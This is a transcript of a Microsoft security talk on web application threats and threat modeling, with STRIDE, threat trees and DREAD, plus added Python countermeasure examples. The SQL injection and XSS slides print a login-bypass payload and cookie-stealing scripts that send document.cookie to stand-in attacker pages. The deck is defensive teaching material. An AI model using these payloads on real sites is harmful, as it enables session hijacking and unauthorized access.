Threats and Threat Modeling - National Chung Cheng University


Threats and Threat Modeling
Murat Gökşin Bakır
Microsoft Regional Director
Yage Ltd
Session Agenda
Types of threats
Threats against the application
SQL injection
Cross-site scripting
Input tampering
Session hijacking
More
Threat modeling
Types of Threats
Threats against the network: spoofed packets, etc.
Threats against the host: buffer overflows, illicit paths, etc.
Threats against the application: SQL injection, XSS, input tampering, etc.
Threats Against the Network
Threat: Examples
Information gathering: port scanning; using trace routing to detect network topologies; using broadcast requests to enumerate subnet hosts
Eavesdropping: using packet sniffers to steal passwords
Denial of service (DoS): SYN floods; ICMP echo request floods; malformed packets
Spoofing: packets with spoofed source addresses
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004
Threats Against the Host
Threat: Examples
Arbitrary code execution: buffer overflows in ISAPI DLLs (e.g., MS01-033)
File disclosure: directory traversal attacks (MS00-078); malformed HTR requests (MS01-031); virtualized UNC share vulnerability (MS00-019)
Denial of service (DoS): malformed SMTP requests (MS02-012); malformed WebDAV requests (MS01-016); malformed URLs (MS01-012); brute-force file uploads
Unauthorized access: resources with insufficiently restrictive ACLs; spoofing with stolen login credentials
Exploitation of open ports and protocols: using NetBIOS and SMB to enumerate hosts; connecting remotely to SQL Server
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh16.asp?frame=true#c16618429_004
Threats Against the Application
Threat: Examples
SQL injection: including a DROP TABLE command in text typed into an input field
Cross-site scripting: using malicious client-side script to steal cookies
Hidden-field tampering: maliciously changing the value of a hidden field
Eavesdropping: using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking: using a stolen session ID cookie to access someone else's session state
Identity spoofing: using a stolen forms authentication cookie to pose as another user
Information disclosure: allowing a client to see a stack trace when an unhandled exception occurs
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?frame=true#c10618429_004
SQL Injection
Exploits applications that use external input in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
How SQL Injection Works
Model Query
SELECT COUNT(*) FROM Users
WHERE UserName='Jeff'
AND Password='imbatman'
Malicious Query (the user name field receives ' or 1=1--)
SELECT COUNT(*) FROM Users
WHERE UserName='' or 1=1--' AND Password=''
"or 1=1" matches every record in the table
"--" comments out the remainder of the query
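The model and malicious queries above, run against a constructed in-memory SQLite table, as an added example that is not code from the slides: the concatenated query accepts the slide's payload, while the parameterized query treats it as an ordinary (non-matching) user name. The table contents and function names are assumptions made for the demo.

```python
import sqlite3

PARAM_SQL = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"


def make_db():
    # Constructed in-memory stand-in for the slide's Users table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    con.execute("INSERT INTO Users VALUES ('Jeff', 'imbatman')")
    return con


def count_users_concat(con, user_name, password):
    # The slide's model query built by string concatenation: raw input becomes
    # part of the SQL text, so a quote and "--" in the input change its meaning.
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='" + user_name +
           "' AND Password='" + password + "'")
    return con.execute(sql).fetchone()[0]


def count_users_parameterized(con, user_name, password):
    # Countermeasure: bind the input as parameters; the driver passes it as
    # data and it can never become SQL syntax.
    return con.execute(PARAM_SQL, (user_name, password)).fetchone()[0]


def demo():
    # Returns (concat with valid login, parameterized with valid login,
    #          concat with the payload, parameterized with the payload).
    # A login check that treats COUNT(*) > 0 as success is fooled by the
    # third case: the payload matches a record without knowing any password.
    con = make_db()
    payload = "' or 1=1--"   # the slide's malicious user-name input
    return (count_users_concat(con, "Jeff", "imbatman"),
            count_users_parameterized(con, "Jeff", "imbatman"),
            count_users_concat(con, payload, ""),
            count_users_parameterized(con, payload, ""))
```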
Cross-Site Scripting (XSS)
Exploits applications that echo raw, unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter whose value is echoed to the Web page
Enter malicious script and get an unwary user to navigate to the infected page
Steal cookies, deface and disable sites
How Cross-Site Scripting Works
URL of the site targeted by the attack:
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>
Query string contains embedded JavaScript that redirects to the attacker's page and transmits cookies issued by Search.aspx in a query string
XSS – How it Works
http://www.a.com/hello.asp?name=Blake
Hello, <% =Request.QueryString("name") %>
http://www.b.com/gather.asp
If Request.Form("cookie") <> "" Then
    data = Request.Form("cookie")
    ' Do whatever I want with the cookie
End If
Response.Redirect "www.microsoft.com"
The Bad URL
http://www.a.com/hello.asp?name=
<FORM action=http://www.b.com/gather.asp method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie; idForm.submit();
</SCRIPT>
Cross-Site Scripting Attacks Based on <form> Tags (2)
<a href=http://www.contoso.msft/welcome.asp?name=
<FORM action=http://www.nwtraders.msft/data.asp method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
here
</a>
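The countermeasure for the hello.asp page above (validate input; HTML-encode output), shown as an added example that is not code from the slides: the raw echo reproduces hello.asp, the encoded version is the fix, and the slide's bad query-string value is used as the test input. The name allow-list pattern and function names are assumptions.

```python
import html
import re

# The query-string value from the slide's "Bad URL", used here as a constructed test input.
BAD_NAME = ('<FORM action=http://www.b.com/gather.asp method=post id="idForm">'
            '<INPUT name="cookie" type="hidden"></FORM>'
            '<SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>')

# Assumed allow-list for a display name: letters, spaces, apostrophes, hyphens, dots.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,39}")


def render_hello_raw(name):
    # Mirrors hello.asp: the query-string value is echoed unfiltered into the page.
    return "Hello, " + name


def render_hello_encoded(name):
    # Countermeasure: HTML-encode output so <, >, &, and quotes reach the browser
    # as text; the browser renders the markup instead of executing it.
    return "Hello, " + html.escape(name, quote=True)


def is_valid_name(name):
    # Countermeasure: validate input against an allow-list before using it at all.
    return NAME_RE.fullmatch(name) is not None


def page_contains_tags(page):
    # Check used by the test: did any markup survive into the rendered page?
    return re.search(r"<[A-Za-z/]", page) is not None
```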
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden fields to persist data between requests
Hidden fields are not really hidden!
How HF Tampering Works
Page contains this…
<input type="hidden" name="price" value="$10,000">
type="hidden" prevents the field from being seen on the page but not in View Source
Postback data should contain this…
price="$10,000"
Instead it contains this…
price="$1"
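One way a server can detect the tampering above, as an added example that is not code from the slides: the hidden field carries the value plus a keyed hash (HMAC) computed on the server, so a postback of price="$1" fails verification. The key, function names and field format are assumptions; the more robust design is to keep the price server-side and post only a product id.

```python
import base64
import hashlib
import hmac

# Assumption: a server-side secret that never reaches the browser (constructed demo value).
SERVER_KEY = b"demo-only-key-replace-with-a-random-secret"


def protect_hidden(name, value):
    # Value to emit in the hidden field: the value plus a MAC over field name and
    # value, so on postback the server can tell whether either was changed.
    msg = name.encode() + b"=" + value.encode()
    tag = hmac.new(SERVER_KEY, msg, hashlib.sha256).digest()
    return value + "|" + base64.urlsafe_b64encode(tag).decode()


def read_hidden(name, posted):
    # On postback: split off the tag, recompute it for the posted value, and
    # compare in constant time. Returns the value if intact, None otherwise.
    value, sep, _tag = posted.rpartition("|")
    if not sep:
        return None
    expected = protect_hidden(name, value)
    if not hmac.compare_digest(expected.encode(), posted.encode()):
        return None
    return value


def checkout_price(posted_price_field):
    # What the order handler should do: use the value only after verification.
    price = read_hidden("price", posted_price_field)
    if price is None:
        raise ValueError("hidden field 'price' failed verification; reject the request")
    return price
```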
Session Hijacking
Web applications use sessions to store state
Sessions are private to individual users
Sessions can be compromised
Threat | Risk Factor
Theft and replay of session ID cookies | High*
Links to sites that use cookieless session state | Medium*
Predictable session IDs | Low*
Remote connection to state server service | Medium
Remote connection to state server database | Medium
Eavesdropping on state server connection | Medium
* Shorter session time-outs mitigate the risk by reducing the attack window
Identity Spoofing
Security depends on authentication
If authentication can be compromised, security goes out the window
Authentication can be compromised
Threat | Risk Factor
Theft of Windows authentication credentials | High
Theft of forms authentication credentials | High
Theft and replay of authentication cookies | Medium*
Dictionary attacks and password guessing | High
* Depends on the time-out values assigned to authentication cookies
Information Disclosure
Which is the better error message? (the slide compares two error pages; the images are not in the transcript)
Threat Modeling
Structured approach to identifying, quantifying, and addressing threats
Essential part of the development process
Just like speccing and designing
Just like coding and testing
One technique presented here
There are others (e.g., OCTAVE)
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh03.asp
The Threat Modeling Process
1. Identify assets
2. Document architecture
3. Decompose application
4. Identify threats
5. Document threats
6. Rate threats
1. Identifying Assets
What is it that you want to protect?
Private data (e.g., customer list)
Proprietary data (e.g., intellectual property)
Potentially injurious data (e.g., credit card numbers, decryption keys)
These also count as "assets"
Integrity of back-end databases
Integrity of the Web pages (no defacement)
Integrity of other machines on the network
Availability of the application
2. Documenting Architecture
Define what the app does and how it's used
Users view pages with catalog items
Users perform searches for catalog items
Users add items to shopping carts
Users check out
Diagram the application
Show subsystems
Show data flow
List assets
Example: architecture diagram (not reproduced in the transcript). Users Alice, Bob and Bill reach the Web server (IIS, ASP.NET, Login page) through a firewall; the Web server talks to the database server (Main and State databases); assets #1 through #6 are marked on the diagram.
3. Decomposing the App
Refine the architecture diagram
Show authentication mechanisms
Show authorization mechanisms
Show technologies (e.g., DPAPI)
Diagram trust boundaries
Identify entry points
Begin to think like an attacker
Where are my vulnerabilities?
What am I going to do about them?
Example: refined diagram (not reproduced in the transcript). The same Web server and database server now show Forms Authentication and URL Authorization on the Web server, Windows Authentication and DPAPI on the database side, and a trust boundary marked between the two.
4. Identifying Threats
Method #1: Threat lists
Start with a laundry list of possible threats
Identify the threats that apply to your app
Method #2: STRIDE
Categorized list of threat types
Identify threats by type/category
Optionally draw threat trees
Root nodes represent the attacker's goals
Trees help identify threat conditions
STRIDE
S Spoofing: Can an attacker gain access using a false identity?
T Tampering: Can an attacker modify data as it flows through the application?
R Repudiation: If an attacker denies an exploit, can you prove him or her wrong?
I Information disclosure: Can an attacker gain access to private or potentially injurious data?
D Denial of service: Can an attacker crash or reduce the availability of the system?
E Elevation of privilege: Can an attacker assume the identity of a privileged user?
Threat Trees
Theft of Auth Cookies (root goal: obtain auth cookie to spoof identity)
OR
  Eavesdropping (AND)
    Unencrypted Connection: cookies travel over unencrypted HTTP
    Attacker uses sniffer to monitor HTTP traffic
  Cross-Site Scripting (AND)
    Attacker possesses means and knowledge
    XSS Vulnerability: application is vulnerable to XSS attacks
5. Documenting Threats
Document threats using a template
Theft of Auth Cookies by Eavesdropping on Connection
Threat target: Connections between browsers and Web server
Risk:
Attack techniques: Attacker uses sniffer to monitor traffic
Countermeasures: Use SSL/TLS to encrypt traffic
Theft of Auth Cookies via Cross-Site Scripting
Threat target: Vulnerable application code
Risk:
Attack techniques: Attacker sends e-mail with malicious link to users
Countermeasures: Validate input; HTML-encode output
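The threat tree from the Threat Trees slide and the two countermeasures from the templates above, encoded and evaluated as an added example that is not code from the slides: the tree's AND/OR structure is walked to list the attack paths that are open given which conditions currently hold, and to confirm that the two documented countermeasures close both paths. The tuple encoding and function names are assumptions made for the demo.

```python
# The slide's threat tree as nested tuples: ("OR" | "AND", [children]);
# a leaf is a threat condition. Root goal: obtain an auth cookie to spoof identity.
THEFT_OF_AUTH_COOKIES = ("OR", [
    ("AND", [                                    # eavesdropping branch
        "Cookies travel over unencrypted HTTP",
        "Attacker uses sniffer to monitor HTTP traffic",
    ]),
    ("AND", [                                    # cross-site scripting branch
        "Attacker possesses means and knowledge",
        "Application is vulnerable to XSS attacks",
    ]),
])

# Countermeasures from the two threat templates, keyed by the condition each removes.
COUNTERMEASURES = {
    "Cookies travel over unencrypted HTTP": "Use SSL/TLS to encrypt traffic",
    "Application is vulnerable to XSS attacks": "Validate input; HTML-encode output",
}


def leaves(node):
    """All leaf conditions in the tree."""
    if isinstance(node, str):
        return frozenset([node])
    return frozenset().union(*(leaves(child) for child in node[1]))


def goal_reachable(node, holding):
    """True if the root goal is reachable given the set of conditions that hold."""
    if isinstance(node, str):
        return node in holding
    op, children = node
    outcomes = [goal_reachable(child, holding) for child in children]
    return any(outcomes) if op == "OR" else all(outcomes)


def attack_paths(node):
    """Minimal sets of leaf conditions that reach the goal, one per route through the ORs."""
    if isinstance(node, str):
        return [frozenset([node])]
    op, children = node
    child_paths = [attack_paths(child) for child in children]
    if op == "OR":
        return [path for paths in child_paths for path in paths]
    combined = [frozenset()]                     # AND: all children must hold together
    for paths in child_paths:
        combined = [done | path for done in combined for path in paths]
    return combined


def open_paths(node, holding):
    """Paths whose conditions all hold now; each needs at least one countermeasure."""
    return [path for path in attack_paths(node) if path <= holding]


ALL_CONDITIONS = leaves(THEFT_OF_AUTH_COOKIES)
AFTER_COUNTERMEASURES = ALL_CONDITIONS - frozenset(COUNTERMEASURES)
```

Applying only SSL/TLS leaves the cross-site scripting path open, which is why the template documents a separate countermeasure for it.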
6. Rating Threats
Simple model
Risk = Probability * Damage Potential
Probability: 1-10 scale (1 = least probable, 10 = most probable)
Damage potential: 1-10 scale (1 = least damage, 10 = most damage)
DREAD model
Greater granularity of threat potential
Rates (prioritizes) each threat on a scale of 1-15
Developed and widely used by Microsoft
DREAD
D Damage potential: What are the consequences of a successful exploit?
R Reproducibility: Would an exploit work every time or only under certain circumstances?
E Exploitability: How skilled must an attacker be to exploit the vulnerability?
A Affected users: How many users would be affected by a successful exploit?
D Discoverability: How likely is it that an attacker will know the vulnerability exists?
DREAD, Cont.
Damage potential
  High (3): Attacker can retrieve extremely sensitive data and corrupt or destroy data
  Medium (2): Attacker can retrieve sensitive data but do little else
  Low (1): Attacker can only retrieve data that has little or no potential for harm
Reproducibility
  High (3): Works every time; does not require a timing window
  Medium (2): Timing-dependent; works only within a time window
  Low (1): Rarely works
Exploitability
  High (3): Bart Simpson could do it
  Medium (2): Attacker must be somewhat knowledgeable and skilled
  Low (1): Attacker must be VERY knowledgeable and skilled
Affected users
  High (3): Most or all users
  Medium (2): Some users
  Low (1): Few if any users
Discoverability
  High (3): Attacker can easily discover the vulnerability
  Medium (2): Attacker might discover the vulnerability
  Low (1): Attacker will have to dig to discover the vulnerability
Example
Threat | D | R | E | A | D | Sum
Auth cookie theft (eavesdropping) | 3 | 2 | 3 | 2 | 3 | 13
Auth cookie theft (XSS) | 3 | 2 | 2 | 2 | 3 | 12
Damage potential: potential for damage is high (spoofed identities, etc.)
Reproducibility: cookie can be stolen any time, but is only useful until expired
Exploitability: anybody can run a packet sniffer; XSS attacks require moderate skill
Affected users: all users could be affected, but in reality most won't click malicious links
Discoverability: easy to discover: just type a <script> block into a field
Prioritized risks: the eavesdropping threat (13) ranks ahead of the XSS threat (12)
Additional Resources
Sanctum AppScan Developer Edition (DE)
Automated unit testing tool that enables rapid development of secure, quality Web applications
Integrates directly into Visual Studio .NET
Real-time scanning of potential vulnerabilities
Comprehensive defect analysis of any ASP.NET site
For more product information: http://www.sanctuminc.com/solutions/appscande/index.html
For a free product trial: http://nct.digitalriver.com/fulfill/0073.1
Microsoft Developer Network
http://msdn.microsoft.com/security
Patterns and Practices Guides
http://www.microsoft.com/patterns
SafeApps™
Secure Code Assurance (SCA) engine
Replaces a manual security code review. @stake expert code reviewer in a box.
Detects the programming errors that lead to security vulnerabilities. Assists in remediating the errors.
Detects programming errors that lead to viruses and worms.
Prioritizes risk of each error from severe error to warning. Optimizes programmer's time.
Guides the programmer to fix the source of error. Most programmers don't know how to fix security errors.
Target user: Developer, QA Engineer, Security Engineer
Development teams that use SafeApps can drastically reduce the number of vulnerabilities in their software.
Resources/Next Steps
NGSCB is part of the Longhorn SDK
Ask your hardware and software vendors what NGSCB-enabled components they will provide
Visit our site and read the white papers and specs: http://www.microsoft.com/ngscb
Send questions to our Q&A alias: [email protected]
Sign up for e-mail updates
Subscribe to the NGSCB information newsletter for ongoing updates. Send blank e-mail to: [email protected]
ASP.NET Whidbey Book
Now available for PDC bits
13 Chapters, 470 Pages
Topics Covered: Introduction, Tools & Architecture, Data Source Controls and Data Binding, GridView & DetailsView Controls, Master Pages & Navigation, Security, Personalization & Themes, Web Parts, Mobile Device Support, SQL Cache Invalidation, Precompilation, Configuration & Administration and more.
Purchase and review at: http://www.asp.net/whidbey
FxCop
Integer Arithmetic Vulns
Once rare, now common
Sun RPC xdr_array (http://www.securityfocus.com/bid/5356)
OpenSSH authentication (http://www.securityfocus.com/bid/5093)
Apache Chunked Encoding (http://www.securityfocus.com/bid/5033)
Microsoft JScript (http://www.microsoft.com/technet/security/bulletin/MS03-008.asp)
FreeBSD socket and system calls (http://www.securityfocus.com/bid/549
Snort TCP Packet Reassembly (http://www.securityfocus.com/bid/7178)
Microsoft MIDI Decoder (http://www.microsoft.com/technet/security/bulletin/MS03-030.asp)
OpenSSL ASN.1 Parsing (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543)
© 2003-2004 Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.